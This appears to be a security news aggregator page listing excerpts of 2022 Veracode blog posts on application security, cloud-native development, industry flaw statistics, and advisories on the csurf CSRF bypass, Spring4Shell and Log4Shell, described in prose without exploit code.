What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2022-10-17 14:44:11 | How Azalea Health Ensures Customer Trust with Cloud-based Software Security (lien direct) | As head of the product department at Azalea Health, I need to understand what our market needs. Based on the conversations that we've had with hospitals and clinics, enterprise-grade security is something they desperately need but rightfully expect their EHR system to provide . That's why it's important for our organization to take the responsibility of securing health data off their shoulders. Because healthcare providers rely on Azalea software to manage patient health records and personal information, our security program starts when the software is being developed. We've always been diligent about software security, and we run penetration tests on a regular basis. However, after we moved our 100 percent cloud-delivered model to AWS in 2021, our focus on security intensified. We recognized the need to catch issues earlier in the development process-before they even got to our staging servers. For us, it was important to find a solution that integrates security into every stage of… | |||
|
2022-10-05 10:56:24 | Choosing Secure Container Images: Secure Cloud-native Development Series (lien direct) | Build secure cloud-native applications by avoiding the top five security pitfalls we lay out in our Secure Cloud-native Development Series. This blog is the first part of the series, and it will teach you how to choose secure container images. When it comes to building secure cloud-native applications, the baseline is choosing a secure container image. Docker defines a container as “a standard unit of software that packages up code and all its dependencies, so the application runs quickly and reliably from one computing environment to another.” The problem is, they're often a pain point for many developers. Journey with us through real examples from the Age of Empires 2 API Project as you learn three ways to ease some pain and strengthen your security posture with container images: pinning, slimming, and updating. 1. Pinning Rather than choosing the “latest” container image, you should be pinning to a specific version of the image. For example: ubuntu:20.04, or python:3.10.6-… | |||
|
2022-10-04 11:20:28 | How to See Yourself in Cyber: Top Tips from Industry Leaders (lien direct) | It's 2022 and as we all know, the world is a very different place. However, one thing that has not changed is the importance of cybersecurity. In fact, it's more important now than ever before, as the SolarWinds hack and Executive Order prove. That's why for Cybersecurity Awareness Month this year, we asked cybersecurity pioneers and leaders to get their insights on staying cyber safe. Here are their thoughts on CISA's 4 Things You Can Do to See Yourself in Cyber. Enable Multi-Factor Authentication “With the continued rise in cybercrime, there are a few simple steps every person should take to protect themselves, if they aren't already. CISA's first recommended step to stay 'cyber-safe' is to implement multi-factor authentication. It significantly lessens the likelihood of being hacked via unauthorized access and compromised credentials, which, according to Verizon's 2021 Data Breach Investigations Report, were the gateway for 61% of data breaches. Enabling multi-factor… | Data Breach Hack Guideline | ★★ | |
|
2022-10-03 10:46:27 | Secure Cloud-native Development: The Top Five Security Pitfalls and How to Avoid Them (lien direct) | Build secure cloud-native applications by avoiding the top five security pitfalls we lay out in our Secure Cloud-native Development Series. The reason organizations are embracing cloud-native development is clear: AWS reports those who migrated saw an average of 20% infrastructure cost savings and 66% increase in administrator productivity. Moving your development process to the cloud offers these benefits and many others, but it also offers a whole new set of security challenges. This series is aimed at helping developers create secure infrastructure for modern, cloud-native applications. You'll learn the top five security pitfalls you can encounter when building applications in the cloud and how to avoid them. Why take the time to learn about securing cloud-native development? As modern applications are integrated closely with cloud technologies (like containers and serverless), developers must now understand these technologies and how to implement them securely from the start. The… | ★★★★ | ||
|
2022-09-28 13:09:06 | How to Engage Developers to Build a Successful Application Security Program (lien direct) | If you're helping shape application security in an organization, whether as an external security consultant or vendor, or as part of an internal security team, it is critical to work effectively with developers. While a lot of individuals have an interest and stake in security, and many have a significant role to play, developers who write code and fix flaws determine whether application security initiatives succeed or fail. Fundamentally, developers are the ones who operationalize application security. The sooner and more effectively they address security issues, the more secure applications will be. The problem is that security is not developers' only area of responsibility. Developers have a lot of competing demands and are typically evaluated and incentivized based on speed of delivery and productivity-rather than security. For those focused on security, it can often be a battle to engage effectively with developers and get the buy in and participation required. If you only… | ★★★★★ | ||
|
2022-09-27 13:24:27 | 6 Developer Personas Every Security Practitioner Needs to Understand (lien direct) | When it comes to engaging developers for a successful application security program, it is helpful to understand the types of developers you are working with. While of course each developer is a unique individual, there are some common personas I have come across in my work with development teams. In fact, as a developer in prior jobs, I have embodied some of these traits myself. Let's dive in. The Competitor This is a developer who feels they know more and do more than their peers, and they want everybody to know that this is the case. These individuals want to be acknowledged as a top contributor and expert, and they treat their work as an opportunity to demonstrate their capabilities. I remember one team ran a scan using an open-source security tool. The scan uncovered around 500 vulnerabilities. The competitive developer took it upon themself to go off, work extra hours and weekends, and single handedly resolve each vulnerability. To engage the competitor, you can try to rollout… | ★★★★★ | ||
|
2022-09-26 12:43:57 | 8 Ways Secure Coding Lets You Work on the Best Projects, Advance Your Career, and Do More of What You Love (lien direct) | As a developer, DevOps engineer, Infrastructure & Operations lead, or similar, you are on the frontlines of application security. You are also on the frontlines of performance, functionality, stability, user experience…the list goes on. Often it seems like security is just one more requirement, one more box to check, one more obstacle between you, your deadline, and what you really care about. But I see it differently. Security probably is not the reason you love coding, but I bet the reason you love coding is made all the richer by embracing security. Or at least it can be. Hear me out. I have been fortunate enough to work in development and to work with developers for decades. Through that experience, I have come to recognize different developer archetypes and their motivations. There are the creators who thrive on creating something that never existed before the day they wrote it into existence. The often falsely labeled “lazy developers” who are efficiency experts and automate… | Guideline | ||
|
2022-09-22 16:06:06 | Healthcare Industry Leads the Way in Fixing Software Flaws (lien direct) | The healthcare industry is transforming patient care through software, from 24/7 digital patient portals, to AI-fueled medical research, and everything in between. As innovation reaches new heights, how does healthcare stack up against other sectors in terms of software security flaws and the ability to remediate them? Our latest State of Software Security Report found that 77 percent of applications in this sector have vulnerabilities – a slight uptick from last year's 75 percent – with 21 percent considered high severity. Healthcare takes first place for fixing flaws at 27 percent. Developers in the space should be applauded for tackling complex authentication issues and insecure dependencies with success over the last 12 months. When clocking the time it takes to remediate flaws found by static analysis (SAST), dynamic analysis (DAST), and software composition analysis (SCA), healthcare organizations fall right in the middle of the pack. It's also worth mentioning that healthcare… | |||
|
2022-09-19 17:40:15 | Analysis and Remediation Guidance of CSRF Vulnerability in Csurf Express.js Middleware (lien direct) | Technical Summary On 28th of August fortbridge.co.uk reported a vulnerability in csurf middleware – expressjs supporting library that enables CSRF protection in expressjs. As of 13th of September csurf library has been deprecated with no plans to fix the vulnerabilities. There is no viable alternative for csurf middleware now. Am I Affected? All versions of csurf library are vulnerable if: csurf is setup to use double-submit cookies – csurf({cookie: true}) and default value function is in use Setting up cookie signatures as described here: https://www.npmjs.com/package/csurf#cookie does not prevent the bypass Indicators of an Attack Reliable indicator of attampted exploitation would include either: request query variable _csrf with a value request body variable _csrf with a value This is assuming the default value function is in use as described here: https://www.npmjs.com/package/csurf#value If verbose access logs are enabled there's another indicator that may be useful. In… | Vulnerability | ||
|
2022-09-12 12:46:56 | 7 Key Benefits of a Reliable Cloud Application Security Partner (lien direct) | When you're looking to secure your applications, you need to keep a few things in mind. You want to make sure that your software security vendor is a fully-Saas vendor you access in the cloud. That way you benefit from scalability, peer benchmarking, and more. Here's what to look for in an application security testing solution that you can access in the cloud while supporting cloud-native development. Plus, you'll learn why cloud-based trumps on-premises solutions. The key components of a reliable cloud application security partner When you're evaluating the ever-changing landscape of different solutions for securing applications, it's important to consider the following factors. Scalability When distinguishing between cloud and on-premises software security vendors, consider the growth of your program, both long-term and as required in the short term. Cloud vendors offer economy of scale as you grow, saving you the costs inherent in hardware for your data center over time. Can… | |||
|
2022-09-07 18:17:09 | 3 Ways Software Engineers Can Save Time and Eliminate DevOps Waste (lien direct) | As software engineers, we are incredibly busy. We're designing new features, writing tests and implementing code, debugging, opening pull requests, and performing code reviews. That's not to mention all of the DevOps stuff that our teams have us doing nowadays, too. Oh yes, and then there are stand-ups, check-ins, one-on-ones, and all-hands. The thing is: you don't have time to waste. If there is wasted time in your workweek, it's worth looking into how to recapture that time. You may find yourself performing a task while asking at the same time, “Why am I spending my time doing this, of all things? Something is wrong here. I've got better things to do.” In this post, we're going to cover what some of those time-wasting and motivation-draining tasks are. We'll consider how you (or your project or your team) got into that mess in the first place. Then, we'll look at how a unified platform can help you recapture that wasted time. Let's dive in and not waste any more time, shall we… | |||
|
2022-08-22 15:34:22 | Financial Services Organizations Have Fewer Security Flaws in Applications (lien direct) | According to our most recent State of Software Security Report, the financial services industry has fewer security flaws in its applications than last year. Great news, right? That said, the reduction in security flaws isn't as significant as we would hope to see. The financial services industry has traditionally been recognized for having the least amount of security flaws. This year, however, the manufacturing industry has dethroned financial services with an average of 72 percent of applications containing a security flaw. Financial services organizations also have more high-severity flaws, 18 percent, and a slower fix rate, 22 percent, than most industries. But take a look at the time it takes the financial services industry to remediate flaws found by static analysis (SAST), dynamic analysis (DAST), and software composition analysis (SCA). When security flaws are found, financial organizations move faster than most to make sure they're remediated. In fact, when it comes… | |||
|
2022-08-17 15:16:19 | The Evolution of Application Security in a Cloud-Native World: Q&A with Chris Wysopal (lien direct) | As technology explodes, so do the threats. Point solutions emerge as security players innovate in order to keep up. This creates the need for consolidation, as the fragmented solutions become too much to manage. We're entering a consolidation phase now, the process of distilling, refining, and letting the cream rise to the top. We sat down with cybersecurity veteran and vigilante, Chris Wysopal, to get his perspective on emerging trends in cloud-native security. Let's dive into the conversation. Natalie Tischler: Chris, it's great to chat with you. I'm inspired by your story and how everything you were doing with L0pht over two decades ago is still what you're doing today: creating a world where software is built securely from the start with clean code. But now we have the cloud. So tell me, what's your take on the evolution of application security in a cloud-native world? Chris Wysopal: What we're seeing with the move to the cloud today mimics the AppSec trends of 15 years ago.… | ★★ | ||
|
2022-08-15 12:25:27 | Announcing the New Veracode® Velocity™ Partner Program (lien direct) | Veracode is pleased to announce the launch of the new Veracode Velocity Partner Program. We've crafted a 3-step approach to align, enable, and engage with our partners so together we can make the world's software secure. What is the Veracode Velocity Partner Program? The Veracode Velocity Partner Program enables our valued Solution Providers to accelerate their application security revenues leveraging the Veracode Platform. Through a role-based strategy and approach, partners can engage and collaborate with Veracode to achieve our mutual goals and objectives. The knowledge, skills, insights, competencies, and best practices gained enhance our partners' ability to deliver industry-leading security solutions and services. This comprehensive program offers our partners tools, resources, and programs to help ensure success at every stage of the customer journey. The goal is to empower our partner teams so they can effectively sell, market, and support the Veracode Platform in our joint… | Guideline | ||
|
2022-08-09 14:37:39 | The Veracode Community Refresh: Everything You Need to Know (lien direct) | You spoke and we listened. Our refreshed Veracode Community is packed with new features and enhancements for a better user experience. The new and improved Veracode Community is here! You can still get the great support you need, when and how you need it. But now we've added simplified navigation, easier onboarding, improved global search, and so much more. Let's dive into the carefully crafted features from the Veracode Community Refresh. Why did we refresh the Veracode Community? We know that building high quality, high performing applications is difficult. We took significant time and energy to refresh the Veracode Community. Quality support, knowledge, tools, and connection are integral to seeing this vision through. And that is exactly what the Veracode Community provides – now more easily than ever. What's new in the new Veracode Community? We've crafted a more welcoming place where everyone can come together to share experiences, learn, and find support on their own terms. We… | |||
|
2022-08-04 10:23:26 | 7 Key Components of a Reliable Cloud-Native Application Security Partner (lien direct) | When you're looking to secure the cloud journey from design to build to deployment, you need to keep a few things in mind. You want to make sure that your software security vendor understands the nuances of software security through the entire software development life cycle (SDLC). Security in context is critical for today's businesses in this age of accelerated digital transformation. Here's what to look for in a cloud-native application security testing solution and why cloud-native trumps on-premises solutions. The key components of a reliable cloud-native application security partner When you're evaluating the ever-changing landscape of different solutions for securing applications in the cloud, it's important to consider the following factors. Scalability When distinguishing between cloud-native and on-premises software security vendors, consider the growth of your program, both long-term and as required in the short term. Cloud-native vendors offers economy of scale as you… | |||
|
2022-07-29 13:22:18 | A Swift Kick in the Nuts and Bolts of Banking (lien direct) | The global financial services industry is undergoing a seismic shift and not enough people are truly aware of what this means. By November of this year, banks and other financial institutions must have in place a new process for payment systems that uses the ISO 20022 standard instead of SWIFT. This must be active by November and by 2025, all financial institutions will have to be compliant. This is a huge ask, made even greater by the increasing levels of instability, technological change, and cybercrime impacting the world's nations. Banking is about to change, and that's not something that banks anywhere like to hear. As a platform for relaying electronic messages between financial institutions, the ISO 20022 standard uses Extensible Markup Language (XML) and Abstract Syntax Notation (ASN.1) protocols to communicate, making it more adaptable to various networks, delivering greater transparency and security, and having the capacity to work with non-Latin alphabets. But that doesn't… | |||
|
2022-07-20 05:00:05 | Veracode Achieves Public Sector Milestone with FedRAMP Authorization (lien direct) | The software security landscape has drastically evolved over the past few years. Think back to the start of COVID-19. The sudden shift to virtual operations expediated digital transformations. Government agencies now have to release new digital products and services in tighter timeframes, causing public sector leadership to choose between speed of deployments or verifiably secure code. The data says it all... According to research conducted by the Enterprise Strategy Group (ESG), 85 percent of organizations push vulnerable code to production and 54 percent do so in order to meet critical deadlines. This need for speed isn't only driving government agencies and contractors to push vulnerable code to production – it's changing the way applications are developed. Increased reliance on microservices and open-source libraries means that applications are assembled as much as they are written. This is made evident in version 12, our most recent, State of Software Security (SOSS) report by… | Guideline | ||
|
2022-07-19 12:40:39 | Yet Another Perspective on Prototype Pollution (lien direct) | Prototypes JavaScript is a programming language based on prototypes instead of classes. When a new object is created, the features of the prototype object are inherited – this includes arrays, functions, and even class definitions. The new object can also act as a template for other inheriting objects, transferring its properties, and creating the prototype chain. This object-based inheritance provides the flexibility and efficiency that web developers favor, yet this behavior opens applications to vulnerabilities via object manipulation. JavaScript objects are easily manipulated via static methods as demonstrated in this blog post. So, when is a case of object manipulation considered to be prototype pollution? Consider the following example of a constructor named Shape: A new object instance of the Shape object is created using the keyword new. The inheritance schema can be illustrated as such: The following shows the prototype chain where the __proto__ property of the… | |||
|
2022-07-15 14:41:00 | Three Ways to Align with the White House\'s Cybersecurity Recommendations (lien direct) | The global pandemic and more recent geo-political events have brought an even greater focus on the threat of cyber attacks on individuals and businesses. Even as global lockdowns and restrictions on movement have eased, many organizations have not adapted to remote or hybrid styles of work. The reality that most of the workforce now operates outside a perimeter that can be controlled creates greater opportunity for scammers, hackers and the potential for cyber attacks than ever before. New intelligence suggests that cyber attacks targeted the United States are being considered. To educate companies, the White House provided a fact sheet that included a comprehensive list of security best practices for organizations seeking to rapidly secure their digital infrastructure. The White House statement recommended public and private organizations move with urgency to enhance their cyber security posture and protect critical infrastructures. Specific recommendations include: Mandate the… | Threat | ||
|
2022-07-11 11:37:58 | How to Leverage Self-Service Peer Benchmarking to Manage and Measure Your Software Security Program (lien direct) | It is not hard to set application security goals. Security teams want to reduce risk. Developers want to quickly meet the requirements of security policy and hit deadlines. Executives want growth within their risk tolerance. What is hard is defining an appropriate level of risk and measuring whether your AppSec program is efficient, effective, and returning expected outcomes based on your investments. While internal analytics can measure directional progress and performance, they do not offer the context to understand if the progress and performance is above, at, or below average. Peer benchmarking gives you that context. Veracode's self-service peer benchmarking puts the power of our unparalleled data into your hands so you can measure against peer organizations to identify strengths and weaknesses, track KPIs, leverage security as a competitive advantage, and more. There are four essential elements necessary to deliver self-service peer benchmarking: A broad and diverse customer… | |||
|
2022-07-08 15:48:47 | Unifying Security and Development (lien direct) | Most developers don't learn about secure coding in the college IT programs. And once they join the workforce, they often don't have the time to learn about secure coding. The responsibility of training developers in secure coding best practices usually falls on security practitioners. Security practitioners are notoriously overworked, often lacking the bandwidth to train developers. Organizations are thus turning to AppSec learning experiences built specifically for development teams. These learning experiences deliver the tools and skills needed to keep an AppSec program on track. According to PeerSpot, the number one ranked solution in application security training software is Veracode Security Labs, which gives developers tools and hands-on training to tackle modern threats and adopt secure coding practices. PeerSpot members who use the platform share why it is deserving of its high ranking. Making the Choice for Veracode Security Labs Veracode Security Labs empowers developers… | Tool Threat | ||
|
2022-07-08 15:29:08 | Musings of a Former State CTO Part 4: Looking Forward (lien direct) | With more than 20 years of working in the public sector behind her, Claire Bailey boasts valuable insights for incoming CTOs. She led the State of Arkansas through a pivotal point in the cybersecurity evolution, becoming an expert in balancing efficiency, accessibility, and security. She views this field as one that holds endless untapped benefits for citizens which can change the way they experience being on the receiving end of public sector services. “Computers can help us do things,” says Claire. “So, let's work together to use them to implement the services citizens need.” The CTO is there to guide the way, ensuring that those services are safe, secure, and private – every day, every hour, and every minute – to protect the public from risk. “You don't get to choose what you do and don't know once you assume that role,” says Claire. “There shouldn't be any question anyone can ask you as a CTO that you don't have at your fingertips. And if you don't, then you should be looking for… | |||
|
2022-06-23 17:31:50 | Musings of a Former State CTO Part 3: The Cybersecurity Evolution (lien direct) | Claire Bailey had a front-row seat to the evolution of cybersecurity. Since the 1980s, when she started in the field, security challenges have grown in number and complexity. She learned that the best strategy for mitigating software vulnerabilities and strengthening cybersecurity has come to be summarized in two little words. “Shift left,” Claire says. “Shifting left” is the concept of taking a security task that traditionally occurs in the later stages of the software development process and performing it earlier. This concept is particularly timely given the fact sheet released by the Biden Administration which warns against the likely rise of potential cyberattacks. It recommends building application security into products from the ground up and using modern tools to consistently monitor for potential vulnerabilities. To that end, Claire recommends that CIOs and CTOs look toward the adoption of agile workforces and development processes, converging steps into smaller bites that… | Tool | ||
|
2022-06-21 17:48:03 | What Are the Most Prevalent Flaws in Your Programming Language? (lien direct) | A few months ago, we released our 12th annual State of Software Security (SOSS) Report. In our announcement blog, we noted new application development trends (like increased use of microservices and open-source libraries), the positive impact that Veracode Security Labs has on time to remediate security flaws, and the increased use of multiple application security scan types. But what we have yet to dive into is the security flaws we found in different programming languages. Much like last year, we created an interactive heat map that lists out the most prevalent flaws by language along with an explanation of the flaw, supporting SOSS data, and tips for preventing the flaw. It's interesting to see that what might be a common flaw for one language, might not even be of concern for another. Take cross-site scripting (XSS), for example. It's the most common flaw for PHP – at 77.2 percent – but it doesn't make the top 10 for C++. For those of you familiar with last year's heat map, you'… | |||
|
2022-06-16 14:15:06 | Musings of a Former State CTO Part 2: Public Service Meets Cybersecurity (lien direct) | Claire Bailey has made a career of improving cybersecurity and the delivery of citizen services in the public sector. As Director of the Arkansas Department of Information Systems and the State Chief Technology Officer (CTO) starting in the early 2000s, Claire leveraged government systems to work for citizens. What's more, she made it possible for government organizations to share data across multiple platforms – easily and securely. “The minute you have that appointment [to a position of leadership] is the minute you're responsible for all citizen cybersecurity risks,” says Claire, Regional Vice President (RVP) of Governmental Affairs at Veracode. “You don't get to say, 'I'm sorry, I don't know the answer to that,' and move on. You're there to get things done for the public you serve.” Getting things done requires diligence. To improve upon service and security, for example, begin by forging strong partnerships in the private sector. “Working with industry partners helps to maximize… | Guideline | ||
|
2022-06-02 15:01:36 | Developing Secure Software With Confidence (lien direct) | Software development and security often have separate challenges and concerns. Developers are worried about pushing software to production in a timely manner. Security teams worry about the security of the code being pushed. Veracode offers a solution that meets the needs of both sides. On Peerspot, where Veracode is ranked number one in application security, users discuss how Veracode enables them to build an advanced application security program. Marcello T., a software architect at a computer software company, has used Veracode for two years and reports it has improved the way his organization functions, mostly because they can perfect the security issues on their products. For open-source projects, his organization also tested Snyk, which, he says, has some problems because it considers each file inside a repository of GitHub as a separate project. As he put it, “It was creating a lot of false positives. That made it basically unmanageable, so we gave up on using it. I trust… | |||
|
2022-05-25 23:53:25 | Musings of a Former State CTO Part 1: The Origin Story (lien direct) | For decades, Claire Bailey has crusaded to combat threats to IT devices and networks. Her journey began in the early 1980s when a devastating personal experience inspired her to improve the system. Claire's father died of a heart attack in 1980 amid a heatwave hitting their rural Texas town. The hospital system had recently transitioned to a new model in which emergent patients were seen by dedicated ER doctors, rather than personal or family doctors being summoned in to treat them. As a result, Claire's father was seen by an ER doctor who was unfamiliar with him and made a snap judgment that he was likely experiencing discomfort due to the heat or had eaten something bad. He was sent home, despite his requests to stay. A few hours after his discharge, Claire's father passed away. The family entered into a legal dispute with the ER doctor and the hospital, and in the course of discovery, a deposition revealed that the ER doctor didn't have access to her father's physical medical… | Threat | ||
|
2022-05-25 14:08:45 | Working for Veracode: A Day in the Life of a Public Relations Intern (lien direct) | How it Started Software security, cybersecurity, application security – before working at Veracode I had a general understanding of these types of terms, but I did not truly grasp the depth and breadth of this industry and its critical role in society. The significant disruption caused by the pandemic has led to an increase in digital transformation efforts with more businesses operating online than ever. Consequently, the digital attack surface is growing at an alarming rate. Prior to Veracode, I worked for a financial communications agency where I gained experience with asset management, private equity, and wealth management clients. After experiencing the day-to-day of PR agency life, I decided to try something new, and switched to an in-house position in a field that had always fascinated me – cybersecurity. In my final week as a Veracoder and master's student at Northeastern University, I took the time to reflect on some of my experiences at Veracode. My university's emphasis on… | ★★★ | ||
|
2022-05-20 17:41:31 | FedRAMP Certification: The \'New Normal\' for Public Sector Agencies? (lien direct) | In the realm of cloud security, public sector agencies have a lot on their plates. From keeping up with the barrage of constantly emerging security guidelines (see below) to the ongoing demands of maintaining software security, the pressure on the government to lock down cybersecurity is immense. Over the last couple of years, Federal Risk and Authorization Management Program (FedRAMP) certifications have emerged as a ubiquitous cybersecurity standard in the public sector – and it's clear why. As agencies move more IT functions to the cloud, FedRAMP enables cloud service providers to meet specific security requirements, such as those embedded in the Federal Information Security Management Act and the National Institute of Standards and Technology publications, allowing agencies to outsource with the confidence that their cloud provider partners are meeting those requirements. Amid the recent cyberattacks – notably SolarWinds and Log4j – government agencies must double down on efforts… | |||
|
2022-05-12 19:06:06 | (Déjà vu) A Look Back at the Executive Order on Cybersecurity (lien direct) | It has officially been one year since the release of the Biden administration's Executive Order on Cybersecurity, which outlines security requirements for software vendors selling software to the U.S. government. These requirements include security testing in the development process and a software bill of materials for the open-source libraries in use so that known vulnerabilities are disclosed and able to be tracked in the future, among other things. The Executive Order – put into motion following the cyberattacks on government agencies through software from SolarWinds and Microsoft – calls on the U.S. Department of Commerce's National Institute of Standards and Technology (NIST) to establish the security initiatives necessary to meet the requirements in a given timeframe. As we've seen over the past twelve months, NIST has met most of the timelines. So far, NIST has: Defined critical software Published guidance outlining security measures for critical software Published guidelines… | |||
|
2022-05-12 19:06:06 | A Look Back at the Executive Order on Cybersecurity (lien direct) | It has officially been one year since the release of the Biden administration's Executive Order on Cybersecurity, which outlines security requirements for software vendors selling software to the U.S. government. These requirements include security testing in the development process and a software bill of materials for the open-source libraries in use so that known vulnerabilities are disclosed and able to be tracked in the future, among other things. The Executive Order – put into motion following the cyberattacks on government agencies through software from SolarWinds and Microsoft – calls on the U.S. Department of Commerce's National Institute of Standards and Technology (NIST) to establish the security initiatives necessary to meet the requirements in a given timeframe. As we've seen over the past twelve months, NIST has met most of the timelines. So far, NIST has: Defined critical software Published guidance outlining security measures for critical software Published guidelines… | ★★ | ||
|
2022-05-11 19:08:48 | (Déjà vu) What Is Software Supply Chain Security? (lien direct) | Most software today isn't developed entirely from scratch. Instead, developers rely on a range of third-party resources to create their applications. By using pre-built libraries, developers don't need to reinvent the wheel. They can use what already exists and spend time on proprietary code, helping to differentiate their software, finish projects quicker, reduce costs, and stay competitive. These third-party libraries make up part of the software supply chain. While their inclusion is beneficial, the software supply chain introduces risk and needs to be secured. Significant breaches in recent times suggest that software supply chain attacks are on the rise. Reading about the Log4j vulnerability or the SolarWinds supply chain attack reminds us that software components can be security threats. Since these types of attacks are relatively new, most organizations often struggle to determine how their applications might be affected and how they should address the threat. Effective… | Vulnerability | ||
|
2022-05-11 19:08:48 | What Is Software Supply Chain Security? (lien direct) | Most software today isn't developed entirely from scratch. Instead, developers rely on a range of third-party resources to create their applications. By using pre-built libraries, developers don't need to reinvent the wheel. They can use what already exists and spend time on proprietary code, helping to differentiate their software, finish projects quicker, reduce costs, and stay competitive. These third-party libraries make up part of the software supply chain. While their inclusion is beneficial, the software supply chain introduces risk and needs to be secured. Significant breaches in recent times suggest that software supply chain attacks are on the rise. Reading about the Log4j vulnerability or the SolarWinds supply chain attack reminds us that software components can be security threats. Since these types of attacks are relatively new, most organizations often struggle to determine how their applications might be affected and how they should address the threat. Effective… | Vulnerability | ★★ | |
|
2022-05-06 15:07:55 | Coded for Safety (lien direct) | Ready to secure government applications? Start with Zero Trust. Trust is the foundation of successful relationships. We want to trust our friends, companies, government, etc., and be trusted in return. But, sometimes mistrust better serves us. A few years ago, the cyber world adopted an approach to security known as trust-but-verify. A simplistic approach, it delivered innovative digital services to consumers – securely and efficiently. Yet as cyber threats intensified, security demands shifted. Today's cyber security mantra is Zero Trust. This comprehensive IT security model allows organizations to restrict access controls to networks, applications, and environments without impacting the performance of applications or the user experience. The bedrock principle of Zero Trust – trust no one – is rapidly becoming the norm in IT security. In the public sector, the government is shifting the security of digital services to Zero Trust. It's a big undertaking – and an important one. Every… | ★★★ | ||
|
2022-05-02 16:55:28 | Official Close of TA Investment Sparks Next Step of Veracode Journey (lien direct) | Recently I shared with you our excitement about our agreement with TA Associates (TA) to make a significant growth investment in Veracode. I am pleased to share that the deal is now closed, opening up a tremendous new chapter in Veracode's journey. In the weeks since the announcement, people I speak with every day – customers, prospective customers, analysts, journalists who cover the critical software security space, and other Veracoders – ask me, “What do you envision together with TA for this next chapter?” Veracode's history is rooted in bringing awareness to the topic of software security and leading the market to action in this area. Going back to 1998, our founder and CTO Chris Wysopal, also known as Weld Pond, along with his colleagues from the hacker group The L0pht, testified to the US Congress about the importance of securing the software and networks that run the internet. Their forward-thinking led to the formation of Veracode, with a vision to provide a scalable,… | Guideline | ||
|
2022-04-25 16:30:51 | How to Generate an SBOM in Veracode SCA (lien direct) | Emerging government regulations have driven the advancement of standards for securing software supply chains. The production of a Software Bill of Materials (SBOM) in a standard format is an increasing audit and compliance need for large organizations. Having an SBOM can help Identify and avoid security risks Understand and manage licensing risks Veracode Software Composition Analysis (SCA) helps teams qualify and manage risks from software running in their environments, better plan and control their security program, and understand where risks may be as new security threats or new versions of software become available. Generating an SBOM in Veracode SCA Veracode SCA SBOM API will help your organization identify vulnerabilities and license risks and help you better understand what software is contained within your application. The SBOM API response provides you with an inventory of the components within your application, including insight into the relationships that the various… | |||
|
2022-04-20 18:35:10 | Just Because You Don\'t Use Log4j or Spring Beans Doesn\'t Mean Your Application is Unaffected (lien direct) | By now, you're probably all aware of the recent Log4j and Spring Framework vulnerabilities. As a recap, the Log4j vulnerability – made public on December 10, 2021 – was the result of an exploitable logging feature that, if successfully exploited, could allow attackers to perform an RCE (Remote Code Execution) and compromise the affected server. The Spring Framework vulnerability – made public on March 29, 2021 – was caused by unforeseen access to Tomcat's ClassLoader as a result of the new Module feature added in Java 9. The access could potentially allow an attacker to write a malicious JSP file accessible via the application server. Just because your organization isn't using a vulnerable version of Log4j or Spring doesn't mean that you aren't using a Java component or development framework that relies on Log4j or Spring Beans. For example, Apache Struts2, ElasticSearch, Apache Kafka, among others, call on Log4j. Our co-founder and CTO, Chris Wysopal explained: “There… | Vulnerability | ||
|
2022-04-12 00:49:45 | Veracode Acquires ML-Powered Vulnerability Remediation Technology From Jaroona GmbH (lien direct) | On the heels of our significant growth investment from TA Associates, we are pleased to announce our acquisition of auto-remediation technology from Jaroona. Jaroona's intelligent remediation technology accelerates Veracode's vision and strategy to automatically detect and remediate software vulnerabilities. Jaroona was recognized as a Gartner Inc. 2021 Cool Vendor for DevSecOps1. Accelerated development practices and dependency on software have increased the software attack surface exponentially, placing a greater strain on development and security teams to ramp up security awareness and skills as well as find and fix flaws across an evolving technical environment. This investment will allow us to offer a unique benefit to our customers, leveraging our collective knowledge over nearly two decades of helping customers find and fix security flaws. This milestone is yet another step toward our vision to deliver a frictionless experience for developers to find and fix security flaws,… | Vulnerability | ★★★ | |
|
2022-04-06 12:25:23 | Testing OWASP\'s Top 10 API Security Vulnerabilities (Part 1) (lien direct) | Application Programming Interface (API) attacks are set to become one of the most prevalent cyberattacks with a broad target range. By nature, APIs expose application logic and sensitive data such as personally identifiable information (PII), causing APIs to become a target for attackers. In 2019, Gartner predicted that API hacks would become the most common form of cyberattacks in 2022. So how can teams stay ahead of API attacks? One answer is by implementing a strong API security strategy that focuses on developer education. Upskilling developers is a key part of a strong API security strategy API security strategies help organizations focus on solutions to understand and mitigate the unique vulnerabilities and security risks of APIs. When designing an API security strategy, it's imperative to look at the experience and training of the developers and determine what they know about API security. Developers are the key to quality – they're building and fixing applications that we… | |||
|
2022-04-01 19:51:15 | Spring4Shell Vulnerability vs Log4Shell Vulnerability (lien direct) | On March 29, 2022, details of a zero-day vulnerability in Spring Framework (CVE-2022-22965) were leaked. For many, this is reminiscent of the zero-day vulnerability in Log4j (CVE-2021-44228) back in December 2021. What is the difference between the vulnerabilities? The Spring Framework vulnerability was caused by unforeseen access to Tomcat's ClassLoader as a result of the new Module feature added in Java 9. The access could potentially allow an attacker to write a malicious JSP file accessible via the application server. On the other hand, the Log4j vulnerability was the result of an exploitable logging feature. If the logging feature is successfully exploited on your infrastructure, attackers can perform an RCE (Remote Code Execution) attack and compromise the affected server. What is the scope of the vulnerabilities? Since we are a cloud-based Software Composition Analysis (SCA) provider, we are able to leverage data on the scope of the vulnerabilities. As we… | Vulnerability | ||
|
2022-03-31 12:15:17 | (Déjà vu) Spring Framework Remote Code Execution (CVE-2022-22965) (lien direct) | Details of a zero-day vulnerability in Spring Framework were leaked on March 29, 2022 but promptly taken down by the original source. Although much of the initial speculation about the nature of the vulnerability was incorrect, we now know that the vulnerability has the potential to be quite serious depending on your organization's use of Spring Framework. There is also a dedicated CVE 2022-22965 assigned to this vulnerability. We will keep this blog updated as new information comes up. Technical summary The cause was initially rumored to be related to deserialization, but the actual cause is due to unforeseen access to Tomcat's ClassLoader as a result of the new Module feature added in Java 9. An existing mitigation only blocked access to the classLoader property of Class objects, but the new Module object also has a classLoader property and was therefore accessible through Spring's property bindings when a Java object is bound to a request parameter. Access to the classLoader… | Vulnerability | ★★★★ | |
|
2022-03-31 12:15:17 | Spring Framework Remote Code Execution (lien direct) | Details of a zero-day vulnerability in Spring Framework were leaked on March 29, 2022 but promptly taken down by the original source. Although much of the initial speculation about the nature of the vulnerability was incorrect, we now know that the vulnerability has the potential to be quite serious depending on your organization's use of Spring Framework. There is also a dedicated CVE 2022-22965 assigned to this vulnerability. We will keep this blog updated as new information comes up. Technical summary Although the cause was initially rumored to be related to deserialization, the actual cause is due to unforeseen access to Tomcat's ClassLoader as a result of the new Module feature added in Java 9. An existing mitigation only blocked access to the classLoader property of Class objects, but the new Module object also has a classLoader property and was therefore accessible through Spring's property bindings when a Java object is bound to a request parameter. Access to the… | Vulnerability | ||
|
